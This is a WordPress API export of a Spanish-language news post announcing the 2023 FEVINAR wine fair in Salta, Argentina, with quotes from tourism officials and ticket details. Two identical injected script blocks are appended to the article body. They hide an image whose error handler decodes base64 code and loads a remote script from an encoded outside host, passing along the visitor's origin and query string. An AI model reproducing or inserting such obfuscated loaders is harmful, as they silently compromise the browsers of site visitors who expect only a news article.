{"id":3164,"date":"2023-10-09T19:39:18","date_gmt":"2023-10-09T22:39:18","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3164"},"modified":"2025-08-14T00:07:25","modified_gmt":"2025-08-14T03:07:25","slug":"la-feria-de-vinos-argentinos-se-realizara-en-salta-el-12-y-13-de-octubre","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3164","title":{"rendered":"La Feria de Vinos Argentinos se realizar\u00e1 en Salta el 12 y 13 de octubre"},"content":{"rendered":"\n<h5 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#ab0754\"><em>Participar\u00e1n m\u00e1s de 60 bodegas del pa\u00eds, de las cuales un 50% son salte\u00f1as. Para el evento que tendr\u00e1 como locaci\u00f3n el Centro de Convenciones Salta, las entradas est\u00e1n a la venta en el sitio eventbrite.com<\/em><\/h5>\n\n\n\n<figure class=\"wp-block-embed alignright is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n<iframe title=\"La Feria de Vinos Argentinos se realizar\u00e1 en Salta el 12 y 13 de octubre\" width=\"696\" height=\"392\" src=\"https:\/\/www.youtube.com\/embed\/AlalTrko2nY?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" allowfullscreen><\/iframe>\n<\/div><\/figure>\n\n\n\n<p>El ministro de Turismo y Deportes&nbsp;<strong>Mario Pe\u00f1a<\/strong>&nbsp;particip\u00f3 de la presentaci\u00f3n a los medios de la 2da Edici\u00f3n de la Feria de Vinos Argentinos (FEVINAR), estuvo acompa\u00f1ado por Juan Lucero, presidente de la C\u00e1mara de Turismo; N\u00e9stor L\u00f3pez de la organizaci\u00f3n de la Feria y Andrea Pieve del Centro de Convenciones. La presentaci\u00f3n se realiz\u00f3 en instalaciones de El Rinc\u00f3n del Olivo.<\/p>\n\n\n\n<p>El titular de la cartera Tur\u00edstica destac\u00f3 el lugar preponderante de Salta en el enotursimo, \u201csomos la segunda provincia argentina despu\u00e9s de Mendoza en ser elegida para el turismo del vino, Salta contin\u00faa su crecimiento como destino\u201d.<\/p>\n\n\n\n<p>Por otra parte, Pe\u00f1a se refiri\u00f3 al crecimiento del turismo brasile\u00f1o gracias a la conectividad: \u201cconquistamos el mercado brasile\u00f1o y uno de lo m\u00e1s importante es su inter\u00e9s por el enoturismo; trabajamos para ampliar la conectividad con otras l\u00edneas a\u00e9reas y otros lugares\u201d.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/9272-la-feria-de-vinos-argentinos-se-realizara-en-salta-el-12-y-13-de-octubre.jpg\"><img fetchpriority=\"high\" decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/9272-la-feria-de-vinos-argentinos-se-realizara-en-salta-el-12-y-13-de-octubre.jpg\" alt=\"La Feria de Vinos Argentinos se realizar\u00e1 en Salta el 12 y 13 de octubre\" width=\"374\" height=\"249\"\/><\/a><\/figure><\/div>\n\n\n<p>En relaci\u00f3n con la FEVINAR, destac\u00f3 la importancia de congregar a m\u00e1s de 60 bodegas en la provincia, desde peque\u00f1as a medianas, para mostrar la calidad de nuestros vinos pero tambi\u00e9n para compartir con otras provincias su producci\u00f3n\u201d.<\/p>\n\n\n\n<p>Por su parte, N\u00e9stor L\u00f3pez de la organizaci\u00f3n de FEVINAR indic\u00f3 que se podr\u00e1n disfrutar vinos de Salta, Catamarca, Jujuy, Mendoza, Tucum\u00e1n entre otras provincias. Aproximadamente el 50% de participantes corresponde a bodegas locales; adem\u00e1s, indic\u00f3 que el 12 y 13 de octubre fecha en que se desarrollar\u00e1 Fevinar, en el Centro de Convenciones habr\u00e1 otras actividades vinculadas a la gastronom\u00eda, cocina, m\u00fasica en vivo.<\/p>\n\n\n\n<p>Andrea Pieve del Centro de Convenciones Salta enfatiz\u00f3 que esta Feria se realiza gracias al esfuerzo de capitales locales en la organizaci\u00f3n de eventos importantes; adem\u00e1s, explic\u00f3 que se usar\u00e1n dos salones: Los Nogales y Algarrobos, con una capacidad de 600 personas cada uno e hizo hincapi\u00e9 en el posicionamiento del destino Salta a trav\u00e9s de estas acciones.<\/p>\n\n\n\n<p>Finalmente, el presidente de la C\u00e1mara de Turismo Juan Lucero sostuvo que Salta se convirti\u00f3 en un destino enol\u00f3gico que beneficia a todo el sector y ayuda en su desarrollo y consider\u00f3 que es fundamental que se generen eventos y se contin\u00fae trabajando por lograr mayor conectividad.<\/p>\n\n\n\n<p>Para adquirir las entradas, puede hacerse a trav\u00e9s de las redes sociales de Fevinar, o bien se debe ingresar al siguiente link:&nbsp;<strong>www.eventbrite.com\/e\/fevinar-2023-tickets-675985509857?aff=ebdssbdestsearch<\/strong>&nbsp;&nbsp;<\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Participar\u00e1n m\u00e1s de 60 bodegas del pa\u00eds, de las cuales un 50% son salte\u00f1as. Para el evento que tendr\u00e1 como locaci\u00f3n el Centro de Convenciones Salta, las entradas est\u00e1n a la venta en el sitio eventbrite.com El ministro de Turismo y Deportes&nbsp;Mario Pe\u00f1a&nbsp;particip\u00f3 de la presentaci\u00f3n a los medios de la 2da Edici\u00f3n de la [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3165,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[24,11,3],"tags":[],"class_list":{"0":"post-3164","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-bodegas","8":"category-datos-utiles","9":"category-gourmet"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3164"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3164"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3164\/revisions"}],"predecessor-version":[{"id":6949,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3164\/revisions\/6949"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3165"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3164"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3164"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3164"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}